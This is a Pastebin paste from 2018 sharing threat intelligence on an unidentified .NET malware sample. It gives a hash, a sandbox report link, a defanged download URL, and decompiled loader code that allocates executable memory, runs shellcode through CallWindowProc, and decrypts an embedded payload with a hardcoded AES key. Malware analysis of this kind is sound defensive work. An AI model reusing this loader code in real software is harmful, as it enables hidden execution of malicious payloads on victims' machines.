API tools faq
paste
Advertisement
Neonprimetime

2018-06-12 unknown malware

Neonprimetime
Jun 12th, 2018
501
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.74 KB | None | 0 0
raw download clone embed print report
  1. found by @James_inthe_box
  2. https://twitter.com/James_inthe_box/status/1006288975621906438
  3. 470636811361e57b48d72095905cc829
  4. https://www.hybrid-analysis.com/sample/dd96a1ab0450b5e856d9171c323ba119d3104b87877dc48d459ab7250e310703?environmentId=120
  5.  
  6. came from
  7. mx2-dokidoki-ne[.]gq/exe/ALVINRIC.exe
  8.  
  9. ------------------------
  10. Interesting .net code
  11. ------------------------
  12. [DllImport("user32.dll", EntryPoint = "CallWindowProc")]
  13. [DllImport("kernel32", EntryPoint = "VirtualAlloc")]
  14.  
  15.  
  16. // DevonEnergyCorporation
  17. using Microsoft.VisualBasic.CompilerServices;
  18. using System;
  19. using System.Reflection;
  20. using System.Runtime.CompilerServices;
  21. using System.Runtime.InteropServices;
  22.  
  23. private static void GentekInc(object RockwellAutomationInc, object HillenbrandIndustriesInc)
  24. {
  25. IntPtr hWnd = Marshal.StringToHGlobalUni(Assembly.GetEntryAssembly().Location);
  26. IntPtr intPtr = (IntPtr)(long)DevonEnergyCorporation.LimitedInc(0u, checked((uint)Convert.ToInt32(RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(HillenbrandIndustriesInc, null, "Length", new object[0], null, null, null)))), 4096u, 64u);
  27. IntPtr intPtr2 = (IntPtr)(long)DevonEnergyCorporation.LimitedInc(0u, checked((uint)Convert.ToInt32(RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(RockwellAutomationInc, null, "Length", new object[0], null, null, null)))), 4096u, 64u);
  28. Type typeFromHandle = typeof(Marshal);
  29. object[] array = new object[4]
  30. {
  31. RuntimeHelpers.GetObjectValue(HillenbrandIndustriesInc),
  32. 0,
  33. intPtr,
  34. null
  35. };
  36. object[] array2 = array;
  37. object instance = HillenbrandIndustriesInc;
  38. array2[3] = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(instance, null, "Length", new object[0], null, null, null));
  39. object[] array3 = array;
  40. object[] arguments = array3;
  41. bool[] array4 = new bool[4]
  42. {
  43. true,
  44. false,
  45. true,
  46. true
  47. };
  48. NewLateBinding.LateCall(null, typeFromHandle, "Copy", arguments, null, null, array4, true);
  49. if (array4[0])
  50. {
  51. HillenbrandIndustriesInc = RuntimeHelpers.GetObjectValue(array3[0]);
  52. }
  53. if (array4[2])
  54. {
  55. intPtr = (IntPtr)Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array3[2]), typeof(IntPtr));
  56. }
  57. if (array4[3])
  58. {
  59. NewLateBinding.LateSetComplex(instance, null, "Length", new object[1]
  60. {
  61. RuntimeHelpers.GetObjectValue(array3[3])
  62. }, null, null, true, false);
  63. }
  64. Type typeFromHandle2 = typeof(Marshal);
  65. object[] array5 = new object[4]
  66. {
  67. RuntimeHelpers.GetObjectValue(RockwellAutomationInc),
  68. 0,
  69. intPtr2,
  70. null
  71. };
  72. object[] array6 = array5;
  73. instance = RockwellAutomationInc;
  74. array6[3] = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(instance, null, "Length", new object[0], null, null, null));
  75. array3 = array5;
  76. object[] arguments2 = array3;
  77. array4 = new bool[4]
  78. {
  79. true,
  80. false,
  81. true,
  82. true
  83. };
  84. NewLateBinding.LateCall(null, typeFromHandle2, "Copy", arguments2, null, null, array4, true);
  85. if (array4[0])
  86. {
  87. RockwellAutomationInc = RuntimeHelpers.GetObjectValue(array3[0]);
  88. }
  89. if (array4[2])
  90. {
  91. intPtr2 = (IntPtr)Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array3[2]), typeof(IntPtr));
  92. }
  93. if (array4[3])
  94. {
  95. NewLateBinding.LateSetComplex(instance, null, "Length", new object[1]
  96. {
  97. RuntimeHelpers.GetObjectValue(array3[3])
  98. }, null, null, true, false);
  99. }
  100. DevonEnergyCorporation.StorageTechnologyCorporation(intPtr, hWnd, intPtr2, 0, 0);
  101. }
  102.  
  103.  
  104. private static object WellsFargoCompany(object PoloRalphLaurenCorp)
  105. {
  106. object objectValue = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(null, Type.GetType("System.Security.Cryptography.Rijndael"), "Create", new object[0], null, null, null));
  107. try
  108. {
  109. object objectValue2 = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(RuntimeHelpers.GetObjectValue(objectValue), null, "CreateDecryptor", new object[2]
  110. {
  111. new byte[32]
  112. {
  113. 1,
  114. 220,
  115. 220,
  116. byte.MaxValue,
  117. 62,
  118. 246,
  119. 11,
  120. 77,
  121. 41,
  122. 28,
  123. 227,
  124. 139,
  125. 132,
  126. 238,
  127. 138,
  128. 87,
  129. 29,
  130. 133,
  131. 199,
  132. 5,
  133. 47,
  134. 49,
  135. 183,
  136. 248,
  137. 166,
  138. 43,
  139. 204,
  140. 42,
  141. 106,
  142. 81,
  143. 157,
  144. 132
  145. },
  146. new byte[16]
  147. {
  148. 41,
  149. 124,
  150. 202,
  151. 177,
  152. 221,
  153. 50,
  154. 38,
  155. 207,
  156. 233,
  157. 5,
  158. 166,
  159. 112,
  160. 203,
  161. 227,
  162. 158,
  163. 107
  164. }
  165. }, null, null, null));
  166. return NewLateBinding.LateGet(RuntimeHelpers.GetObjectValue(objectValue2), null, "TransformFinalBlock", new object[3]
  167. {
  168. RuntimeHelpers.GetObjectValue(PoloRalphLaurenCorp),
  169. 0,
  170. RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(PoloRalphLaurenCorp, null, "Length", new object[0], null, null, null))
  171. }, null, null, null);
  172. }
  173. finally
  174. {
  175. if (objectValue != null)
  176. {
  177. ((IDisposable)objectValue).Dispose();
  178. }
  179. }
  180. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!